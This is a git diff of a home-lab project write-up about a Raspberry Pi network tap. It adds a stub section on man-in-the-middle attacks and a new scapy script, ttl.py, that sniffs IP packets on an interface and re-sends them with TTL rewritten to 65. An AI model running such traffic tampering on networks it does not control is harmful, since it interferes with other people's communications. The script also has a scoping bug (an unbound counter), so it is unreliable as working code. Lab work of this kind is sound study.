diff --git a/final/final.md b/final/final.md index 9bdec6f..044ee41 100644 --- a/final/final.md +++ b/final/final.md @@ -155,7 +155,7 @@ Like before, discarded/dropped frames number only 1 or 2 over a period of severa Now it is time to do something interesting with pitap by capturing and forwarding the traffic. -The script [`capture.py`](./capture.py) is intended to do just this. Using scapy, the script works by sniffing all traffic on an interface provided from arguments, and saving those to a unique timestamped file. Every time a file is saved, it attempts to transmit them to a supplied ip address and port (defaults to my workstation on LAN) with the intention that a listening netcat server can capture and save the contents. +The script [`capture.py`](./scripts/capture.py) is intended to do just this. Using scapy, the script works by sniffing all traffic on an interface provided from arguments, and saving those to a unique timestamped file. Every time a file is saved, it attempts to transmit them to a supplied ip address and port (defaults to my workstation on LAN) with the intention that a listening netcat server can capture and save the contents. The professional thing to do here would be to connect the raspberry pi via wifi to an entirely seperate network, or even to set it up as an access point so that way it can communicate with a netcat server running off the network I am snooping on. However, since we are no longer evaluating the transparency of the pitap I will keep things simple for the sake of time by just connecting pitap via wifi to my router again. I will also be running the netcat server on my workstation, which is the same one consuming the RTSP stream from reolink while I capture. This should all be fine, since transmission to the netcat server will be exclusively over wifi and not on ethernet. @@ -191,4 +191,12 @@ Here is a look at `received_file-1.pcap` in wireshark. For this capture, I start -### 6. Attack \ No newline at end of file +### 6. Attack + +To wrap up, I will create three MiTM style attacks that can be executed by the pitap + +#### 6a. TTL=65 + +#### 6b. + +#### 6c. \ No newline at end of file diff --git a/final/capture.py b/final/scripts/capture.py similarity index 100% rename from final/capture.py rename to final/scripts/capture.py diff --git a/final/scripts/ttl.py b/final/scripts/ttl.py new file mode 100644 index 0000000..d946c3a --- /dev/null +++ b/final/scripts/ttl.py @@ -0,0 +1,29 @@ +import sys +from scapy.all import sniff, send, IP +from datetime import datetime + +modifications = 0 + +def modify_packet(packet): + if packet.haslayer(IP): + if packet[IP].ttl != 65: + packet[IP].ttl = 65 + modifications += 1 + send(packet) + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print(f"Usage: {sys.argv[0]} ") + sys.exit(1) + + interface = sys.argv[1] + + start_time = datetime.now() + print(f"Script started at: {start_time.strftime('%Y-%m-%d %H:%M:%S')}") + + packets = sniff(filter="ip", iface=interface, timeout=30*1, prn=modify_packet) + + end_time = datetime.now() + print(f"Script ended at: {end_time.strftime('%Y-%m-%d %H:%M:%S')}") + print(f"{modifications} packets modified") \ No newline at end of file